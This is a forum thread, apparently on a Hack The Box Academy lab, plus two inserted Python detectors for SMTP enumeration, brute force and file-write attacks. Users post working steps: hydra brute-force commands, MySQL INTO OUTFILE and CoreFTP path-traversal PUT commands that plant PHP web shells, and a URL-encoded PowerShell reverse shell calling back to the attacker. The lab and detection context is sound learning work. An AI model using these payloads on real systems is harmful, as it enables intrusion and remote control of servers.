If anyone else is getting the error: mysql: command not found
It seems that mysql isn’t currently installed in the attackbox, so you have to do it yourself.
Type: sudo apt install mariadb-client
to get it going.
I agree with everyone that this password should really be a password from the resources list… however, you must enumerate the password using rockyou
smtp-user-enum xxxxxxxxxx 25 -m RCPT -d inlanefreight.htb -U usernames
hydra -l xxxxxx@inlanefreight.htb -P rockyou xxxxxxxxxx smtp -t 40 -s -vvv
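The two commands above (RCPT-based user enumeration, then an SMTP password brute force) leave a very recognisable trace on the mail server side. As an added example that is not part of this thread, here is a small detector that reads Postfix-style smtpd log lines and flags a source IP that probes many unknown recipients in a short window, or racks up repeated SASL authentication failures. The log lines are constructed sample data (the IPs, usernames and timestamps are made up), and the thresholds and window are assumptions you would tune for your own volume.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Postfix-style smtpd log excerpt (sample data, not from the lab).
# 10.10.14.5 probes six unknown recipients in a few seconds, then fails SASL
# auth five times; 192.0.2.10 is a single legitimate typo and should not alert.
SAMPLE_LOG = "\n".join(
    [
        f"Jan 10 12:00:0{i} mail postfix/smtpd[2210]: NOQUEUE: reject: RCPT from "
        f"unknown[10.10.14.5]: 550 5.1.1 <{u}@inlanefreight.htb>: Recipient address "
        f"rejected: User unknown in local recipient table; from=<probe@example.com> "
        f"to=<{u}@inlanefreight.htb> proto=ESMTP helo=<x>"
        for i, u in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"], start=1)
    ]
    + [
        f"Jan 10 12:05:{30 + i:02d} mail postfix/smtpd[2215]: warning: unknown[10.10.14.5]: "
        f"SASL LOGIN authentication failed: authentication failure"
        for i in range(5)
    ]
    + [
        "Jan 10 12:10:00 mail postfix/smtpd[2220]: NOQUEUE: reject: RCPT from "
        "mail.partner.example[192.0.2.10]: 550 5.1.1 <typo@inlanefreight.htb>: Recipient "
        "address rejected: User unknown in local recipient table; from=<a@partner.example> "
        "to=<typo@inlanefreight.htb> proto=ESMTP helo=<mail.partner.example>",
    ]
)

TS = r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) "
# A rejected RCPT for a non-existent local user: the signal smtp-user-enum -m RCPT produces.
RCPT_UNKNOWN = re.compile(
    TS + r".*RCPT from \S*\[(?P<ip>[^\]]+)\]: 550 .*?<(?P<rcpt>[^>]+)>: "
    r"Recipient address rejected: User unknown"
)
# A failed SMTP AUTH attempt: the signal a hydra smtp run produces.
SASL_FAIL = re.compile(TS + r".*warning: \S*\[(?P<ip>[^\]]+)\]: SASL \w+ authentication failed")


def _parse_ts(text):
    # Syslog timestamps carry no year; only the deltas between events matter here.
    return datetime.strptime(text, "%b %d %H:%M:%S")


def _burst(times, threshold, window):
    """True if at least `threshold` events fall inside some `window`-second span."""
    times = sorted(times)
    for i in range(len(times) - threshold + 1):
        if (times[i + threshold - 1] - times[i]).total_seconds() <= window:
            return True
    return False


def analyze(log_text, enum_threshold=5, auth_threshold=5, window=60):
    """Return {ip: [finding, ...]} for RCPT user enumeration and SMTP auth brute force."""
    rcpt = defaultdict(list)   # ip -> [(timestamp, recipient)]
    sasl = defaultdict(list)   # ip -> [timestamp]
    for line in log_text.splitlines():
        m = RCPT_UNKNOWN.search(line)
        if m:
            rcpt[m["ip"]].append((_parse_ts(m["ts"]), m["rcpt"]))
            continue
        m = SASL_FAIL.search(line)
        if m:
            sasl[m["ip"]].append(_parse_ts(m["ts"]))

    findings = defaultdict(list)
    for ip, events in rcpt.items():
        distinct = {r for _, r in events}
        if len(distinct) >= enum_threshold and _burst([t for t, _ in events], enum_threshold, window):
            findings[ip].append(f"smtp-user-enum: {len(distinct)} unknown recipients probed via RCPT")
    for ip, times in sasl.items():
        if _burst(times, auth_threshold, window):
            findings[ip].append(f"smtp-auth-bruteforce: {len(times)} SASL failures")
    return dict(findings)


if __name__ == "__main__":
    for ip, notes in analyze(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(notes))
```

Counting distinct rejected recipients rather than raw rejects keeps one mis-typed address from a partner server below the threshold, while a wordlist run trips it within seconds; the same logic works on VRFY/EXPN rejections if a server has those verbs enabled.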
Yeah I didn’t like the first part. I was able to find the username no problem. But what to do with this information was annoying. Should be sticking to the resources in the module if that’s what you have been using this entire module. However, once you get into the database. That is interesting and a good learning experience into webshells. I didn’t bother with FTP.
fr I wasted so much time thinking that the password would be in the resource list. Like what’s the point of the resources anymore.
Hello everyone;
If someone is still stuck in this part and needs some hints about how to get the flag;
1/ Do your enumeration and get the necessary creds,
2/ Try these with the active services on the target machine,
3/ Else, if you tried to use mysql => SELECT LOAD_FILE(CONCAT(@@basedir, 'Path_to_the_flag\flag.txt'));
-----G00d H4Ck1N9------
STOP OVERHEADING
Finding a web server doesn’t mean you need to exploit it. Avoid overcomplicating the process; simple methods often yield better results.
- Access MySQL: Connect using the obtained credentials.
- Read a File: Execute LOAD_FILE to retrieve the file contents.
If you have problems with hydra terminate the machine and start a new one.
I wasted a lot of time thinking i was wrong but the problem was from the machine.
Also if you have the following error for SQL
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it
Add --skip-ssl
at the end of the command, it should look like this:
mysql -u <user> -p<pass> -h <ip> --skip-ssl
If you find credentials, there is another way to get the flag. The Latest FTP Vulnerabilities section mentions the CoreFTP before build 727
vulnerability. It is as easy as the mysql way. File traversal is the key.
curl -k -X PUT -H "Host: 10.10.10.10" --basic -u YYYY:XXXX --data-binary '<?php system($_GET["cmd"]); ?>' --path-as-is https://10.10.10.10/../xampp/htdocs/backd.php
C:/Users/Administrator/Desktop/flag.txt
One way is:
smtp-user-enum and get the user;
hydra brute-force the smtp for the pass;
try the creds against the available services;
find that they work on mysql;
enumerate the mysql db for any new leads;
drop a shell:
SELECT "<?php if(isset($_GET['cmd'])){ echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>'; } ?>" INTO OUTFILE 'C:/xampp/htdocs/cmd.php';
#test via curl:
curl http://10.129.91.12/cmd.php?cmd=whoami
#if OK:
#Start your listener
nc -lvnp 4444
#Then through the webshell (URL encode this):
curl http://target_ip/cmd.php?cmd=powershell%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27***YOUR_IP***%27%2C4444%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22
catch the shell and cat the flag!
https://www.revshells.com/ will create a nice reverse shell. Use the PowerShell #3 (Base64) shell so you don’t have to worry about URL-encoding anything.
To upload a reverse shell using MySQL:
SELECT "<?php echo shell_exec('<shell command>');?>" INTO OUTFILE 'C:/xampp/htdocs/shell.php';
where <shell command> is what you copy from the clipboard in the revshells.com window; it looks like: powershell -e BlahblahBLAH
To upload a reverse shell using FTP vulnerable to CVE-2022-22836:
curl -k -X PUT -H "Host: inlanefreight.htb" --basic -u username:password --data-binary '<?php shell_exec("<shell code>"); ?>' --path-as-is https://10.129.178.249/../../../../xampp/htdocs/shell.php
where username and password are the credentials you enumerated.
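Both write-a-file routes discussed in this thread (SELECT ... INTO OUTFILE into the XAMPP htdocs directory, and a PUT with path traversal against the CoreFTP web service) are easy to spot once the right logs are on. As an added example that is not from the thread or from either product, the script below scans MySQL general-log lines for LOAD_FILE and for INTO OUTFILE/DUMPFILE targets that land in a web root or carry PHP, scans combined-format access-log lines for upload methods with `..` in the path (after URL decoding), and interprets the secure_file_priv value that SHOW VARIABLES prints, since that setting is what decides whether the MySQL route works at all. All log lines and paths are constructed sample data; the access-log layout for the CoreFTP service is an assumption.

```python
import re
from urllib.parse import unquote

# Constructed sample data; neither log comes from the lab machine.
# MySQL general query log, 5.7+ layout: time <TAB> thread id <SPACE> command <TAB> argument.
GENERAL_LOG = """\
2024-01-10T12:00:01.000000Z\t   12 Connect\tbob@10.10.14.5 on  using TCP/IP
2024-01-10T12:00:02.000000Z\t   12 Query\tSHOW DATABASES
2024-01-10T12:00:03.000000Z\t   12 Query\tSELECT LOAD_FILE(CONCAT(@@basedir, 'secret\\flag.txt'))
2024-01-10T12:00:04.000000Z\t   12 Query\tSELECT "<?php ... ?>" INTO OUTFILE 'C:/xampp/htdocs/cmd.php'
2024-01-10T12:00:05.000000Z\t   13 Query\tSELECT id, name FROM customers INTO OUTFILE '/var/lib/mysql-files/export.csv'
"""

# Combined-format access log as assumed for the HTTP service fronting the FTP root.
ACCESS_LOG = """\
10.10.14.5 - bob [10/Jan/2024:12:10:00 +0000] "PUT /../../../../xampp/htdocs/shell.php HTTP/1.1" 201 0 "-" "curl/8.5.0"
10.10.14.5 - bob [10/Jan/2024:12:10:05 +0000] "PUT /%2e%2e/%2e%2e/xampp/htdocs/shell.php HTTP/1.1" 201 0 "-" "curl/8.5.0"
198.51.100.7 - - [10/Jan/2024:12:11:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - alice [10/Jan/2024:12:11:30 +0000] "PUT /uploads/report.pdf HTTP/1.1" 201 0 "-" "curl/8.5.0"
"""

WEB_ROOT_HINTS = ("htdocs", "www", "wwwroot", "public_html")
SCRIPT_SUFFIXES = (".php", ".jsp", ".aspx", ".asp")

QUERY_RE = re.compile(r"^\S+\t\s*(?P<thread>\d+) Query\t(?P<sql>.*)$")
OUTFILE_RE = re.compile(r"INTO\s+(?:OUTFILE|DUMPFILE)\s+'(?P<path>[^']+)'", re.I)
LOADFILE_RE = re.compile(r"\bLOAD_FILE\s*\(", re.I)
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_mysql_log(text):
    """Return (thread_id, kind, sql) for file-system-touching statements in a general log."""
    findings = []
    for line in text.splitlines():
        m = QUERY_RE.match(line)
        if not m:
            continue
        sql, thread = m["sql"], int(m["thread"])
        if LOADFILE_RE.search(sql):
            findings.append((thread, "load_file", sql))
        om = OUTFILE_RE.search(sql)
        if om:
            path = om["path"].replace("\\", "/").lower()
            in_webroot = any(hint in path.split("/") for hint in WEB_ROOT_HINTS)
            is_script = path.endswith(SCRIPT_SUFFIXES)
            if in_webroot or is_script or "<?php" in sql.lower():
                findings.append((thread, "outfile_webroot", sql))   # web shell drop pattern
            else:
                findings.append((thread, "outfile", sql))           # ordinary export, low severity
    return findings


def scan_access_log(text):
    """Return (ip, user, method, raw_path) for write methods whose path traverses upward."""
    findings = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        decoded = unquote(unquote(m["path"]))          # double-decode to catch %252e%252e
        traversal = "../" in decoded or "..\\" in decoded
        if m["method"] in ("PUT", "MOVE", "COPY", "MKCOL") and traversal:
            findings.append((m["ip"], m["user"], m["method"], m["path"]))
    return findings


def assess_secure_file_priv(value):
    """Interpret the value SHOW VARIABLES LIKE 'secure_file_priv' prints."""
    if value is None or value.strip().upper() == "NULL":
        return "disabled", "LOAD_FILE and INTO OUTFILE cannot touch the filesystem at all"
    if value.strip() == "":
        return "weak", "any path mysqld can read or write is reachable, including the web root"
    return "restricted", f"file operations are confined to {value.strip()}"


if __name__ == "__main__":
    for f in scan_mysql_log(GENERAL_LOG):
        print("mysql", f)
    for f in scan_access_log(ACCESS_LOG):
        print("http", f)
    for v in ("", "NULL", "/var/lib/mysql-files/"):
        print(repr(v), "->", assess_secure_file_priv(v))
```

The general log is off by default, so on a server you own the cheaper control is the last function's "restricted" or "disabled" state plus not granting FILE to application accounts; the log scans are for confirming after the fact which thread or client wrote the file.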
Make sure you actually see port 25 open on your nmap scan. I’ve wasted hours against this machine, because it was duff.
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
80/tcp open http
443/tcp open https
587/tcp open submission
3306/tcp open mysql
3389/tcp open ms-wbt-server
Can someone please help me? I’ve tried smtp-user-enum tool with the user.list from the resources, but I’m not getting anything. I also checked for the port 25 to be opened. I’ve been working on this lab for far too long without any luck. I read every comment in this thread, but still can’t even find the user.
Hi,
I’m experiencing some issues with this lab and would appreciate some clarification:
- Why does SMTP not allow VRFY or EXPN on both ports?
- Why are we required to use rockyou.txt or another external wordlist when the module already provides one?
To be honest, this and the password attack assessments feel poorly designed. They seem like a complete waste of time.
After long brute-force attempts, you eventually find a user and password. However, there seems to be no other way to progress. I’m not sure how others in this thread are managing, but I’ve tried resetting the server multiple times over several days, and the results are always the same.
Could you please clarify if this is the intended experience or if something is wrong with the setup?
Just writing to express my complete frustration with HTB.
Clearly when you provide a password list in resources, people will expect to use this for all password spraying as it’s a lab environment.
I wasted hours because of this. For anyone else stuck, use rockyou.
I encountered the same issue. Just reset the target and you will find everything is working fine.